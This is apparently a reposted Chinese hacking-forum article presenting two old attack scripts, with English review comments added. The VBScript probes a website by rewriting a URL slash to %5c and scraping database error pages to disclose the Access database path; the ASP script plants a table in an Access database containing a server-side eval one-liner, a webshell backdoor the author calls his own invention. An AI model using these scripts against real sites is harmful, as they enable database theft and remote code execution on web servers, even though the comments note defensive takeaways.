
N年前的两个脚本暴库

' MapPath-error database path check (the window title below credits "Lilo").
' Flow as written: read a page URL, replace its last "/" with "%5c", POST to
' the rewritten URL, then search the response for database error text and
' show the file path quoted inside it.
' Defensive reading: the script depends on the site returning raw database
' error pages. Custom error pages, error handling around the connection
' code, and keeping the database file outside the web root remove what it
' searches for.
' Script-level variables that xmlPost fills in.
Dim xStatus,tStatus,vServer,vHeader,vRsBody

' Prompt text: "Please enter the site, for example: <URL>"; the example URL is also the default value.
GetError=InputBox("请输入网站,例如:http://www.hackerxfiles.com/files/list.asp?id=415","请输入网址","http://www.hackerxfiles.com/files/list.asp?id=415")

' Empty input or Cancel: show "Input error, program ends!" and stop.
If GetError = "" Then

MsgBox("输入错误,程序结束!")

WScript.Quit

End If

' Work on the reversed URL so the first "/" met (Chr(47)) is the last one
' in the original string.
GetError=StrReverse(GetError)

' Tem2 counts replacements; only the first match is rewritten.
Tem2=0

For I=1 To Len(GetError)

If Mid(GetError,I,1) = Chr(47) And Tem2=0 Then

' "c5%" reads "%5c" once the string is reversed back.
Temp=Temp & "c5%"

Tem2=Tem2+1

Else

Temp=Temp & Mid(GetError,I,1)

End If

Next

GetError=StrReverse(Temp)

' Sends the request; results arrive through the script-level variables.
Call xmlPost(GetError)

' Header line for the result window: Server response header plus HTTP status.
ErrorText = vServer & " " & xStatus

' Three error-message patterns are tried in turn; GetStr returns "[None]"
' when a pattern is absent.
' Pattern 1: text between "Could not find file '" and "'。</font>" followed by a line feed.
BaseSaver = GetStr(vRsBody,"找不到文件 '","'。</font>" & Chr(10))

If BaseSaver="[None]" Then

' Pattern 2: text between the opening font tag (face "宋体", size 2) and "' is not a valid path."
BaseSaver = GetStr(vRsBody,"<font face="&Chr(34)&"宋体"&Chr(34)&" size=2>'","'不是一个有效的路径。")

End If

If BaseSaver="[None]" Then

' Pattern 3: text between "open registry key '" and "'。</font>".
BaseSaver = GetStr(vRsBody,"打开注册表关键字 '","'。</font>")

End If

' Build the HTML for the result window (title: "Get database address from
' Mappath error"). With no match the whole response body is shown,
' otherwise only the extracted path.
' NOTE(review): the remote text is placed inside the textarea without HTML
' encoding, so markup in the response is rendered by the local IE window.
If BaseSaver = "[None]" Then

AllReturn= "<TITLE>Mappath出错获取数据库地址 Lilo</TITLE><Body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><B>" & ErrorText & "</B><BR><BR><textarea rows='15' name='S1' cols='57'>" &vRsBody& "</textarea>"

Else

AllReturn= "<TITLE>Mappath出错获取数据库地址 Lilo</TITLE><Body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><B>" & ErrorText & "</B><BR><BR><textarea rows='15' name='S1' cols='57'>" &BaseSaver& "</textarea>"

End If

Call OpenWin(AllReturn)

' Bring the result window to the foreground by its title.
Set WHShell = WScript.CreateObject("WScript.Shell")

WHShell.AppActivate "Mappath出错获取数据库地址 Lilo"

'WHShell.SendKeys ("%{TAB}")

Set WHShell = Nothing

' Percent-encodes every character whose Asc() magnitude is &HFF or more as
' two bytes ("%HH%LL"); all other characters are copied through unchanged,
' so reserved ASCII characters are not escaped by this routine.
' NOTE(review): the high byte is derived with "\ &HFF" rather than
' "\ &H100" and Hex() output is not zero-padded; both are kept exactly as
' the original wrote them.
Function URLEncoding(vstrIn)
    Dim encoded, pos, total, ch, code
    encoded = ""
    total = Len(vstrIn)
    pos = 1
    Do While pos <= total
        ch = Mid(vstrIn, pos, 1)
        code = Asc(ch)
        If Abs(code) >= &HFF Then
            ' Asc() reports double-byte characters as negative 16-bit values.
            If code < 0 Then code = code + &H10000
            encoded = encoded & "%" & Hex((code And &HFF00) \ &HFF) & "%" & Hex(code And &HFF)
        Else
            encoded = encoded & ch
        End If
        pos = pos + 1
    Loop
    URLEncoding = encoded
End Function

' Converts a byte sequence into a VBScript string. A byte below &H80 becomes
' one character; any other byte is combined with the byte that follows it
' (lead * &H100 + trail) and the pair is passed to Chr() as one code.
' NOTE(review): this looks like it assumes a double-byte ANSI code page on
' the machine running the script - confirm before relying on the output.
Function bytes2BSTR(vIn)
    Dim text, pos, total, lead, trail
    text = ""
    total = LenB(vIn)
    pos = 1
    Do While pos <= total
        lead = AscB(MidB(vIn, pos, 1))
        If lead >= &H80 Then
            trail = AscB(MidB(vIn, pos + 1, 1))
            text = text & Chr(CLng(lead) * &H100 + CInt(trail))
            ' Two bytes were consumed for this character.
            pos = pos + 2
        Else
            text = text & Chr(lead)
            pos = pos + 1
        End If
    Loop
    bytes2BSTR = text
End Function

' Sends a synchronous POST with no body to iURL and stores the outcome in
' the script-level variables xStatus, tStatus, vServer, vHeader and vRsBody.
' The function name is never assigned, so nothing is returned.
Function xmlPost(iURL)

' Errors from here on are skipped silently; a statement that fails leaves
' its target variable holding whatever it had before.
On Error Resume Next

' iPost is not assigned anywhere in this listing and the result is not
' passed to Send below.
iPost=URLEncoding(iPost)

Set xPost = CreateObject("Microsoft.XMLHTTP")

' Third argument False = synchronous: Send blocks until the response arrives.
xPost.open "POST",iURL,False

xPost.Send

xStatus = xPost.Status

tStatus = xPost.StatusText

vServer = xPost.GetResponseHeader("Server")

vHeader = xPost.GetAllResponseHeaders

' responseBody is the raw byte data; bytes2BSTR turns it into a string.
vRsBody = bytes2BSTR(xPost.responseBody)

Set xPost = Nothing

End Function

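' Returns the text found in vString between the first occurrence of iString
' and the next occurrence of dString after it.
' Returns "[None]" when either marker is missing.
Function GetStr(vString,iString,dString)
    Dim startPos, bodyPos, endPos
    GetStr = "[None]"
    ' Search the argument that was passed in. The earlier version ignored
    ' vString and always read the script-level vRsBody.
    startPos = InStr(vString, iString)
    If startPos = 0 Then Exit Function
    bodyPos = startPos + Len(iString)
    ' Look for the closing marker only after the opening marker, so a
    ' closing marker that also matches inside the opening one cannot
    ' produce a negative length for Mid.
    endPos = InStr(bodyPos, vString, dString)
    If endPos = 0 Then Exit Function
    GetStr = Mid(vString, bodyPos, endPos - bodyPos)
End Function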

' Left-pads vNum with "0" characters up to a width of vLen.
' When vNum is already vLen characters or longer it is returned as passed
' in, without conversion to a string.
Function IntToStr(vNum,vLen)
    Dim missing
    missing = vLen - Len(vNum)
    If missing <= 0 Then
        IntToStr = vNum
    Else
        ' Int() keeps the count equal to the number of passes the counting
        ' loop would make for the same bound.
        IntToStr = String(Int(missing), "0") & CStr(vNum)
    End If
End Function

' Splits unStr on vaStr and returns a result selected by Mode:
'   Mode = -1        the whole array
'   Mode = -2        the upper bound of the array
'   other negatives  nothing (the return value stays Empty)
'   Mode > bound     False
'   otherwise        the element at index Mode
Function GetSplit(unStr,vaStr,Mode)
    Dim parts, lastIdx
    parts = Split(unStr, vaStr)
    lastIdx = UBound(parts)
    If Mode = -1 Then
        GetSplit = parts
    ElseIf Mode = -2 Then
        GetSplit = lastIdx
    ElseIf Mode >= 0 Then
        If Mode > lastIdx Then
            GetSplit = False
        Else
            GetSplit = parts(Mode)
        End If
    End If
End Function

' Opens an Internet Explorer window (500 x 335, toolbar and status bar
' hidden) and writes vTTv into its document. Nothing is returned.
Function OpenWin(vTTv)

Set IE = WScript.CreateObject("InternetExplorer.Application")

IE.Navigate "about:blank"

IE.Visible = 1 

IE.ToolBar = 0

IE.StatusBar = 0

IE.Width=500

IE.Height=335

' Spin until IE stops reporting Busy; the loop body is empty, so this
' polls without sleeping.
Do While (IE.Busy): Loop

Set Doc = IE.Document

Doc.Open

' NOTE(review): vTTv is spliced into source text that Execute then parses
' as VBScript. The caller in this listing builds vTTv from the remote
' response body, so text supplied by the server is interpreted as code on
' the machine running the script, and a double quote or line break in it
' changes the statement. Passing the value as data ("Doc.Writeln vTTv")
' avoids evaluating it.
Execute "Doc.Writeln " & Chr(34) & vTTv & Chr(34)

Doc.Close

' Drops the script's reference only; IE.Quit is not called.
Set IE=Nothing

End Function

另一个是我写的,向access里插入asp代码来当作后门,这应当是我的首创了,不过我也不知道有没有人更早发现过。后来网上就流传开直接向数据库插入一句话来得到webshell。不知不觉时光飞逝,4年过去了,人老了,难道只能怀旧吗?

<%

' Opens an Access database through the Jet OLE DB provider, creates a table
' named notdownload with a single OLE-object column, and appends one record
' whose field holds a fixed byte sequence.
' The bytes spell a server-side script element (runat=server) whose body
' evaluates a posted form field.
' NOTE(review): presumably this relies on the database file being served
' under a script-mapped extension (the sample name ends in .asp), so the
' ASP engine would parse the stored bytes as page code - confirm against
' the server configuration.
' Defensive takeaways: keep database files outside the web root and off
' script-mapped extensions, and treat "runat=server" or "<%" byte sequences
' inside a data file, or an unexpected notdownload table, as indicators
' worth investigating.

db="0123.asp" ' change this to the path of your database

set conn=server.createobject("Adodb.Connection")

' Server.MapPath turns the virtual path in db into a physical file path.
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(db)

conn.open connstr

' add the notdownload table

conn.execute("create table notdownload(notdown oleobject)")

' write the <% data
' (wording kept from the original comment; the bytes appended below form a
' script element rather than a <% tag)

set rs=server.createobject("adodb.recordset")

    sql="select * from notdownload"

' 1 = keyset cursor, 3 = optimistic locking, which makes the recordset updatable.
rs.open sql,conn,1,3

rs.addnew

' chrB(asc(c)) yields one byte per character, so the field receives
' single-byte text rather than a two-byte-per-character string.
    rs("notdown").appendchunk(chrB(asc("<")) & chrB(asc("s")) & chrB(asc("c"))& chrB(asc("r")) & chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(" "))& chrB(asc("r"))& chrB(asc("u"))& chrB(asc("n"))& chrB(asc("a"))& chrB(asc("t"))& chrB(asc("="))& chrB(asc("s"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc("v"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc(" "))& chrB(asc("l"))& chrB(asc("a"))& chrB(asc("n"))& chrB(asc("g"))& chrB(asc("u"))& chrB(asc("a"))& chrB(asc("g"))& chrB(asc("e"))& chrB(asc("="))& chrB(asc("j"))& chrB(asc("a"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">"))& chrB(asc("e"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("l"))& chrB(asc("("))& chrB(asc("r"))& chrB(asc("e"))& chrB(asc("q"))& chrB(asc("u"))& chrB(asc("e"))& chrB(asc("s"))& chrB(asc("t"))& chrB(asc("."))& chrB(asc("f"))& chrB(asc("o"))& chrB(asc("r"))& chrB(asc("m"))& chrB(asc("("))& chrB(asc("'"))& chrB(asc("#"))& chrB(asc("'"))& chrB(asc(")"))& chrB(asc("+"))& chrB(asc("'"))& chrB(asc("'"))& chrB(asc(")"))& chrB(asc("<"))& chrB(asc("/"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">")))

    rs.update

    rs.close

set rs=nothing

' close the connection

conn.close

set conn=nothing

%>

本文由 华域联盟 原创撰写:华域联盟 » N年前的两个脚本暴库

转载请保留出处和原文链接:https://www.cnhackhy.com/14918.htm

本文来自网络,不代表华域联盟立场,转载请注明出处。

作者: sterben
